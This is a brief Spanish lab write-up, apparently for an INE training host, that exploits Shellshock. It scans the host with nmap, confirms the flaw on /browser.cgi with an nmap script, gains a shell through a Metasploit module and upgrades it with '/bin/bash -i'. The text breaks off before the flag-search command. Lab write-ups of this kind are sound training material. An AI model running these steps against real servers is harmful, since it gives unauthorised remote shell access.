Empezamos como siempre con un nmap a todos los puertos
nmap -sV -sC -p- target1.ine.local

Solo tiene el puerto 80 abierto a si que vamos a ver que web hay.

La web principal nos redirige a un .cgi vamos a comprobar si es vulnerable con nmap
nmap --script http-shellshock --script-args "http-shellshock.uri=/browser.cgi" target1.ine.local

State: VULNERABLE (Exploitable) a si que vamos a buscar en Metasploit el módulo shellshock
Usaremos multi/http/apache_mod_cgi_bash_env_exec
Ponemos RHOSTS , LHOST y TARGETURI apuntando a /browser.cgi y lanzamos con run

Ahora abrimos una shell con shell y /bin/bash -i para hacerla interactiva, para buscar todas las flag, usamos este comando find